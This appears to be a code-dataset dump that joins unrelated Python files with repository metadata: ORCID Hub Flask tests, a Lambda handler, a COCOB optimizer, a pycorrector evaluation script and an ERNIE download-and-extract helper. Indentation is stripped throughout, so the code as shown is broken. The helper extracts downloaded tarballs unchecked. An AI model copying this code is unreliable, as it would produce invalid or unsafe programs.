UserInvitation.create(
invitee=user,
inviter=user,
org=org,
task=task1,
email="<EMAIL>",
token="<PASSWORD>")
task2 = Task.create(
id=2,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=1)
FundingRecord.create(
task=task2,
title="Test titile",
translated_title="Test title",
translated_title_language_code="Test",
type="GRANT",
organization_defined_type="Test org",
short_description="Test desc",
amount="1000",
currency="USD",
org_name="Test_orgname",
city="Test city",
region="Test",
country="Test",
disambiguated_org_identifier="Test_dis",
disambiguation_source="Test_source",
is_active=True,
visibility="Test_visibity")
task3 = Task.create(
id=3,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=3)
PeerReviewRecord.create(
id=1,
task=task3,
review_group_id=1212,
is_active=True,
visibility="Test_visibity")
work_task = Task.create(
id=4,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=2)
WorkRecord.create(
id=1,
task=work_task,
title=1212,
is_active=True,
citation_type="Test_citation_type",
citation_value="Test_visibity")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/affiliation_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', task1.id)])
rv = ctxx.app.full_dispatch_request()
t = Task.get(id=1)
ar = AffiliationRecord.get(id=1)
assert "The record was reset" in ar.status
assert t.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/affiliation_record_reset_for_batch")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/funding_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', task2.id)])
rv = ctxx.app.full_dispatch_request()
t2 = Task.get(id=2)
fr = FundingRecord.get(id=1)
assert "The record was reset" in fr.status
assert t2.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/funding_record_reset_for_batch")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/peer_review_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', task3.id)])
rv = ctxx.app.full_dispatch_request()
t2 = Task.get(id=3)
pr = PeerReviewRecord.get(id=1)
assert "The record was reset" in pr.status
assert t2.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/peer_review_record_reset_for_batch")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/work_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', work_task.id)])
rv = ctxx.app.full_dispatch_request()
t = Task.get(id=4)
pr = WorkRecord.get(id=1)
assert "The record was reset" in pr.status
assert t.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/work_record_reset_for_batch")
def test_issue_470198698(request_ctx):
"""Test regression https://sentry.io/royal-society-of-new-zealand/nz-orcid-hub/issues/470198698/."""
from bs4 import BeautifulSoup
admin = User.get(email="<EMAIL>")
org = admin.organisation
task = Task.create(org=org, filename="TEST000.csv", user=admin)
AffiliationRecord.insert_many(
dict(
task=task,
orcid=f"XXXX-XXXX-XXXX-{i:04d}" if i % 2 else None,
first_name=f"FN #{i}",
last_name=f"LF #{i}",
email=f"test{i}") for i in range(10)).execute()
with request_ctx(f"/admin/affiliationrecord/?task_id={task.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
soup = BeautifulSoup(resp.data, "html.parser")
orcid_col_idx = next(i for i, h in enumerate(soup.thead.find_all("th"))
if "col-orcid" in h["class"]) - 2
with request_ctx(f"/admin/affiliationrecord/?sort={orcid_col_idx}&task_id={task.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
soup = BeautifulSoup(resp.data, "html.parser")
orcid_column = soup.find(class_="table-responsive").find_all(class_="col-orcid")
assert orcid_column[-1].text.strip() == "XXXX-XXXX-XXXX-0009"
with request_ctx("/admin/affiliationrecord/") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
with request_ctx(f"/admin/affiliationrecord/?task_id=99999999") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
``` |
{
"source": "jpeezy-undaunted/cil-internship-cohort-02",
"score": 2
} |
#### File: Module 2 Task/LambdaCFTUsingS3Bucket/index.py
```python
def lambda_handler(event, context):
print('THIS IS LAMBDA CREATED FROM CLOUDFORMATION')
return 'success'
``` |
{
"source": "jpeg729/pytorch-bits",
"score": 3
} |
#### File: pytorch-bits/optim/cocob.py
```python
import torch
from torch.optim.optimizer import Optimizer, required
class COCOB(Optimizer):
def __init__(self, params, alpha=100, weight_decay=False):
defaults = dict(alpha=alpha, weight_decay=weight_decay)
super(COCOB, self).__init__(params, defaults)
def __setstate__(self, state):
super(COCOB, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
alpha = group['alpha']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if group['weight_decay'] != 0:
d_p.add_(group['weight_decay'], p.data)
state = self.state[p]
if len(state) == 0:
state['L'] = torch.zeros_like(p.data)
state['gradients_sum'] = torch.zeros_like(p.data)
state['grad_norm_sum'] = torch.zeros_like(p.data)
state['reward'] = torch.zeros_like(p.data)
state['w'] = torch.zeros_like(p.data)
L = state['L']
reward = state['reward']
gradients_sum = state['gradients_sum']
grad_norm_sum = state['grad_norm_sum']
old_w = state['w']
torch.max(L, torch.abs(d_p), out=L)
torch.max(reward - old_w * d_p, torch.Tensor([0]), out=reward)
gradients_sum.add_(d_p)
grad_norm_sum.add_(torch.abs(d_p))
# the paper sets weights_t = weights_1 + new_w
# we use the equivalent formula: weights_t = weights_tm1 - old_w + new_w
new_w = state['w'] = -gradients_sum / (L * torch.max(grad_norm_sum + L, alpha * L)) * (L + reward)
p.data.add_(-1, old_w)
p.data.add_(new_w)
return loss
``` |
{
"source": "jpegbert/pycorrector",
"score": 2
} |
#### File: pycorrector/examples/evaluate_models.py
```python
import argparse
import os
import sys
sys.path.append("../")
import pycorrector
pwd_path = os.path.abspath(os.path.dirname(__file__))
def demo():
idx_errors = pycorrector.detect('少先队员因该为老人让坐')
print(idx_errors)
def main(args):
if args.data == 'sighan_15' and args.model == 'rule':
# right_rate:0.1798201798201798, right_count:180, total_count:1001;
# recall_rate:0.15376676986584106, recall_right_count:149, recall_total_count:969, spend_time:121 s
from pycorrector.utils.eval import eval_sighan_2015_by_rule
eval_sighan_2015_by_rule()
if args.data == 'sighan_15' and args.model == 'bert':
# right_rate:0.37623762376237624, right_count:38, total_count:101;
# recall_rate:0.3645833333333333, recall_right_count:35, recall_total_count:96, spend_time:503 s
from pycorrector.utils.eval import eval_sighan_2015_by_bert
eval_sighan_2015_by_bert()
if args.data == 'sighan_15' and args.model == 'ernie':
# right_rate:0.297029702970297, right_count:30, total_count:101;
# recall_rate:0.28125, recall_right_count:27, recall_total_count:96, spend_time:655 s
from pycorrector.utils.eval import eval_sighan_2015_by_ernie
eval_sighan_2015_by_ernie()
if args.data == 'corpus500' and args.model == 'rule':
# right_rate:0.486, right_count:243, total_count:500;
# recall_rate:0.18, recall_right_count:54, recall_total_count:300, spend_time:78 s
from pycorrector.utils.eval import eval_corpus500_by_rule, eval_data_path
# 评估规则方法的纠错准召率
out_file = os.path.join(pwd_path, './eval_corpus_error_by_rule.json')
eval_corpus500_by_rule(eval_data_path, output_eval_path=out_file)
if args.data == 'corpus500' and args.model == 'bert':
# right_rate:0.586, right_count:293, total_count:500;
# recall_rate:0.35, recall_right_count:105, recall_total_count:300, spend_time:1760 s
from pycorrector.utils.eval import eval_corpus500_by_bert, eval_data_path
# 评估bert模型的纠错准召率
out_file = os.path.join(pwd_path, './eval_corpus_error_by_bert.json')
eval_corpus500_by_bert(eval_data_path, output_eval_path=out_file)
if args.data == 'corpus500' and args.model == 'ernie':
# right_rate:0.598, right_count:299, total_count:500;
# recall_rate:0.41333333333333333, recall_right_count:124, recall_total_count:300, spend_time:6960 s
from pycorrector.utils.eval import eval_corpus500_by_ernie, eval_data_path
# 评估ernie模型的纠错准召率
out_file = os.path.join(pwd_path, './eval_corpus_error_by_ernie.json')
eval_corpus500_by_ernie(eval_data_path, output_eval_path=out_file)
if __name__ == '__main__':
demo()
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default='sighan_15', help='evaluate dataset, sighan_15/corpus500')
parser.add_argument('--model', type=str, default='rule', help='which model to evaluate, rule/bert/ernie')
args = parser.parse_args()
main(args)
```
#### File: pycorrector/ernie/file_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import os
from pathlib import Path
from tqdm import tqdm
log = logging.getLogger(__name__)
def _fetch_from_remote(url, force_download=False, cached_dir='~/.paddle-ernie-cache'):
import hashlib, requests, tarfile
sig = hashlib.md5(url.encode('utf8')).hexdigest()
cached_dir = Path(cached_dir).expanduser()
try:
cached_dir.mkdir()
except OSError:
pass
cached_dir_model = cached_dir / sig
if force_download or not cached_dir_model.exists():
cached_dir_model.mkdir()
tmpfile = cached_dir_model / 'tmp'
with tmpfile.open('wb') as f:
# url = 'https://ernie.bj.bcebos.com/ERNIE_stable.tgz'
r = requests.get(url, stream=True)
total_len = int(r.headers.get('content-length'))
for chunk in tqdm(r.iter_content(chunk_size=1024),
total=total_len // 1024,
desc='downloading %s' % url,
unit='KB'):
if chunk:
f.write(chunk)
f.flush()
log.debug('extacting... to %s' % tmpfile)
with tarfile.open(tmpfile.as_posix()) as tf:
tf.extractall(path=cached_dir_model.as_posix())
os.remove(tmpfile.as_posix())
log.debug('%s cached in %s' % (url, cached_dir))
return cached_dir_model
def add_docstring(doc):
def func(f):
f.__doc__ += ('\n======other docs from supper class ======\n%s' % doc)
return f
return func
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.